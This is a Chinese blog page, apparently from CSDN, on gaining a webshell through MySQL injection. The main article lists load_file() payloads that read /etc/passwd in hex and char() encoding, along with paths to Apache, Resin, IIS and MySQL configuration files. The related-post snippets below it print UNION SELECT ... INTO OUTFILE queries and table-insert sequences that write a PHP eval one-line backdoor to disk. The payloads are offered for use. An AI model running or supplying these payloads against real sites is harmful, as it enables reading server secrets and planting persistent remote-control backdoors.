MySQL数据库写入一句话

最新推荐文章于 2021-05-12 05:06:48 发布
最新推荐文章于 2021-05-12 05:06:48 发布
阅读量1.8k 收藏 1
点赞数 2
分类专栏: 学习 小白 文章标签: web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32108547/article/details/95649605
版权
本文介绍了通过MySQL数据库的load_file()函数结合c:/windows/my.ini路径,探讨数据注入时获取WebShell的方法。利用phpmyadmin的路径泄露漏洞,创建表并插入一句话木马,最终实现权限提升。
摘要由CSDN通过智能技术生成

针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:

1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
5、c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf 查看WINDOWS系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:/APACHE/Apache2/conf/httpd.conf
9、C:/Program Files/mysql/my.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
11、 c:/windows/system32/inetsrv/MetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
最低0.47元/天 解锁文章
L_lemo004
关注
专栏目录
22-2.1 get基于报错的sql注入利用-读敏感文件和写入一句话木马
weixin_43263566的博客
01-25 252
通过这个查询语句,攻击者尝试将一段包含恶意PHP代码的字符串写入到一个指定的文件中,从而创建一个后门(backdoor)程序,可以让攻击者对受害者的服务器进行远程控制和操作。这是一个恶意的SQL注入攻击,它使用UNION注入的方式向数据库中插入一段包含恶意PHP代码的字符串,并将其存储到指定的文件中。因为我也不知道靶场的敏感文件是哪个,所以我就读取我们刚才注入的木马文件。判断MysQL的存储路径方便我们写入一句话马。双击刚才创建的连接就能进入目标的文件管理界面。在现实的情况下这种注入手段成功率很低。
MySQL数据库写入webshell
weixin_45253622的博客
03-24 935
MySQL数据库写入webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 写入的那个路径存在写入权限 注意点: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
MySQL一句话WebShell
ShadowySpirits的博客
10-03 5141
本文介绍两种利用 MySQL getshell 的方法: select … into outfile general_log 一、select … into outfile 介绍 利用需要满足以下条件: 对web目录有写权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置 –secure-file-priv 姿势: 有 union id=2) union...
针对MYSQL数据注入时用到的 load_file()函数
dibodang1423的博客
05-16 261
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)...
mysql一句话代码_mysql 写入一句话
weixin_39932479的博客
01-18 539
mysql 写入一句话方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启 如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上 如果为一个目录,如:s...
mysql写入一句话的方式
孤的博客
09-30 1269
一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into outfile “C:\phpStudy\PHPTutorial\WWW\shell.php” --+ 1’ union select 1,2,’<?p...
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2381
讲一下SQL注入中写一句话webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
mysql木马一句话_phpmyadmin写一句话木马拿webshell思路(骇客协会)
weixin_39790877的博客
02-07 450
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
mysql注入写一句话_MySQL手工注入步骤+直接写入一句话
weixin_29227585的博客
01-19 2733
(1)判断注入点 接着通过and 1=1 和 and 1=2测试发现前者正常,后者异常,可以肯定存在注入点,接下来判断该页面查询数据库的字段(2)查询字段数http://unisscan.cn/list.php?lei=246 order by n--结果发现有31个字段 (3)看看哪些字段可以显示信息http://unisscan.cn/list.php?lei=246 and 1=2 uni...
MYSQL写入一句话的方式
孤的博客
09-13 1426
一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\shell.php" --+ 1' union select 1,2,'&l...
linux mysql写入一句话,mysql 写入一句话
weixin_39947908的博客
05-12 274
mysql 写入一句话方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启 如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上 如果为一个目录,如:s...
MYSQL快速写入一句话拿权限技巧
KHOST的博客
01-31 775
必须条件: root权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置–secure-file-priv id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’# <? phpinfo()...
mysql写入一句话木马
热门推荐
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
MYSQL一句话写入
1002710030
12-29 717
mysql_query("insert into `qq`(`id`,`xm1`,`xm2`,`xm3`)values(NULL,'$xm1','$xm12','$xm13')");
mysql一句话
jihaichen的博客
05-06 1340
1、创建一个表create TABLE a (cmd text NOT NULL);2、插入数据insert INTO a (cmd) VALUES('&lt;?php eval($_POST[hihack]);?&gt;');3、导出一句话select cmd from a into outfile 'C:\AppServ\www\x.php';4、删除表Drop TABLE IF EXISTS...
php mysql语句一句话,MYSQL经典语句大全——开发篇
weixin_27565831的博客
03-23 182
MYSQL经典语句大全——开发篇黄舟2016-12-20 16:36:10原创5611.按姓氏笔画排序:Select * From TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as //从少到多2.数据库加密:select encrypt('原始密码')select pwdencrypt('原始密码')select p...
通过mysql写入一句话木马
aocong5568的博客
10-11 1964
USE mysql;# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 CREATE TABLE a( cmd1 text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 INSERT INTO a( cmd1 ) VALUES ( '<?php e...
渗透测试面试必备:信息收集与MySQL安全要点
7. **MySQL注入写入一句话**:实现MySQL注入写入文件通常需要root权限、网站的绝对路径、load_file()函数或into outfile语句的支持,且需要满足特定的权限和过滤条件。 这些面试题反映了渗透测试工程师需要具备的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值